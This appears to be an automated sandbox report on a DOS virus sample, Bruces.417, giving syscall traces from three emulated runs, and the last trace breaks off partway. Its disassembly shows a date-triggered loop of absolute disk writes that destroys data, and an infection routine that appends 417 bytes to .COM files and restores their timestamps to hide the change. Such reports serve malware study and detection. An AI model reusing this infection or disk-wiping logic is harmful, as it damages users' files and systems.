Sample viewer

vx.netlux.org/Virus.DOS.Bruces.417

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:13:26.06981486Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]
2018-12-17T22:13:26.07236114Z 26 PC: 12c18 | Set disk transfer address
2018-12-17T22:13:26.07346842Z 78 PC: 12b7b | Find first file
2018-12-17T22:13:26.079199899Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.096255585Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:13:26.107193507Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.113803732Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.116110923Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.11871542Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.126564181Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.128179222Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.134728596Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.135935417Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.14342109Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.153519144Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.158330162Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.168315465Z 61 PC: 12ba2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:13:26.175662977Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.182288067Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.18355945Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.186803665Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.189579139Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.190892005Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.194054752Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.195823551Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.203167512Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.213726859Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.216501368Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.225926912Z 61 PC: 12ba2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:13:26.232962252Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.239194917Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.240575116Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.243257995Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.246842324Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.248173234Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.251688013Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.253280023Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.260386658Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.270064469Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.272683116Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.282011098Z 61 PC: 12ba2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:13:26.288510325Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.294802426Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.29608528Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.298454811Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.301271853Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.302543723Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.304977176Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.306678852Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.314140982Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.32356092Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.326180158Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.336063903Z 61 PC: 12ba2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:13:26.342328146Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.348423282Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.349662148Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.351720998Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.354557804Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.355852714Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.358261671Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.359797978Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.366645891Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.379034373Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.381781611Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.391069668Z 61 PC: 12ba2 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:13:26.397218399Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.403464452Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.404680958Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.406753418Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.414723042Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.416024897Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.422133568Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.423575647Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.430995576Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.440641591Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.443054348Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.452135654Z 61 PC: 12ba2 | Open file (Filename = 'PAH.COM')
2018-12-17T22:13:26.458300711Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.464698527Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.465956919Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.46811184Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.471453676Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.472677407Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.475218826Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.477404922Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.484455863Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.493950812Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.497138948Z 67 PC: 12b99 | Get or set file attributes
2018-12-17T22:13:26.506920036Z 61 PC: 12ba2 | Open file (Filename = 'TEST.COM')
2018-12-17T22:13:26.513293804Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:13:26.519576042Z 66 PC: 12bb6 | Move file pointer
2018-12-17T22:13:26.520760986Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-17T22:13:26.522233429Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:13:26.52793351Z 66 PC: 12bd6 | Move file pointer
2018-12-17T22:13:26.529015559Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:13:26.531661486Z 87 PC: 12bf4 | Get or set file date and time
2018-12-17T22:13:26.533439699Z 62 PC: 12bf8 | Close file
2018-12-17T22:13:26.541055631Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T22:13:26.550986587Z 79 PC: 12b7b | Find next file
2018-12-17T22:13:26.554387235Z 26 PC: 12c18 | Set disk transfer address
2018-12-17T22:13:26.555696202Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:05.924001114Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]
2018-12-25T11:46:05.926636397Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:05.928421923Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:05.936015047Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.123157996Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.132041187Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.139724136Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:46:06.142089401Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-25T11:46:06.146034698Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.157125435Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.159052639Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.168154325Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.170540416Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.179651794Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.191726865Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.195363741Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.206566729Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.214628978Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.223187659Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.224897244Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.227906526Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.232269837Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.234182534Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.237888629Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.25311428Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.261725133Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.273555515Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.277472064Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.289135047Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.297013826Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.305711268Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.30779786Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.310886825Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.31566338Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.31767226Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.321122094Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.323237802Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.338464272Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.351385362Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.354457057Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.367012173Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.374739056Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.381818494Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.384102728Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.387337502Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.391301469Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.393776285Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.397170829Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.399177968Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.408324083Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.419899878Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.423294312Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.436646488Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.444252225Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.451498098Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.453577077Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.457231368Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.460633617Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.462430765Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.467337435Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.469443957Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.477664727Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.489862304Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.492971365Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.504398Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.513456905Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.520711533Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.522519602Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.525524439Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.535901191Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.537889409Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.545652752Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.548744398Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.558012555Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.570206489Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.574436096Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.585967766Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.593749334Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.602069658Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.60440862Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.607395277Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.611161291Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.613960168Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.617291274Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.619302785Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.628947625Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.640872747Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.644160407Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.656157967Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.664213774Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.66705798Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.669750684Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.672282442Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.681459583Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.68409168Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.687386926Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.689290935Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.697946899Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.711196037Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.71424309Z 26 PC: 12c18 | Set disk transfer address (See above)
2018-12-25T11:46:06.715427898Z 9 PC: 12a47 | Display string (String= 'This is a dummy phile for the Spiritual Bruces virus 1.00!')

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2609,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:06.022397462Z 42 PC: 12b43 | Get date 0x12b43: cmp dh, 0xa
0x12b46: jne 0x12b60
0x12b48: cmp dl, 0x11
0x12b4b: jne 0x12b60
0x12b4d: mov al, 2
0x12b4f: mov cx, 1
0x12b52: lea bx, word ptr [bp + 0x223]
0x12b56: cdq
0x12b57: int 0x26
0x12b59: inc dx
0x12b5a: jae 0x12b57
0x12b5c: inc al
0x12b5e: jmp 0x12b4f
0x12b60: mov di, 0x100
0x12b63: lea si, word ptr [bp + 0x2a1]
0x12b67: movsw word ptr es:[di], word ptr [si]
0x12b68: movsb byte ptr es:[di], byte ptr [si]
0x12b69: lea dx, word ptr [bp + 0x2a4]
0x12b6d: call 0x12c14
0x12b70: lea dx, word ptr [bp + 0x298]
2018-12-25T11:46:06.036335124Z 26 PC: 12c18 | Set disk transfer address
2018-12-25T11:46:06.037273783Z 78 PC: 12b7b | Find first file
2018-12-25T11:46:06.042922656Z 67 PC: 12b99 | Get or set file attributes
2018-12-25T11:46:06.059324564Z 61 PC: 12ba2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:06.064446916Z 63 PC: 12bae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:06.07070426Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:46:06.0810917Z 44 PC: 12bc5 | Get time 0x12bc5: je 0x12bc1
0x12bc7: mov word ptr [bp + 0x11e], dx
0x12bcb: call 0x22b02
0x12bce: cdq
0x12bcf: xor cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x29e]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x2bc]
0x12be5: mov cx, word ptr [bp + 0x2ba]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2c2]
2018-12-25T11:46:06.083370706Z 64 PC: 12b10 | Write file or device (Write 417 bytes on handle 5)
2018-12-25T11:46:06.09221054Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:46:06.09457939Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:06.10138668Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:46:06.103195565Z 62 PC: 12bf8 | Close file
2018-12-25T11:46:06.111305759Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:46:06.122623359Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.125142742Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.135179719Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.141839456Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.147925807Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.14921531Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.1514713Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.154102589Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.155307123Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.158328709Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.159856227Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.167128929Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.17766602Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.180324994Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.191078198Z 61 PC: 12ba2 | Open file (See above)
2018-12-25T11:46:06.20347948Z 63 PC: 12bae | Read file or device (See above)
2018-12-25T11:46:06.209663844Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:46:06.210954779Z 44 PC: 12bc5 | Get time (See above)
2018-12-25T11:46:06.213549791Z 64 PC: 12b10 | Write file or device (See above)
2018-12-25T11:46:06.21627688Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:46:06.217530264Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:46:06.220518553Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:46:06.221880779Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:46:06.22893401Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:46:06.239006947Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:46:06.241469504Z 67 PC: 12b99 | Get or set file attributes (See above)
2018-12-25T11:46:06.250845388Z 61 PC: 12ba2 | Open file (See above)
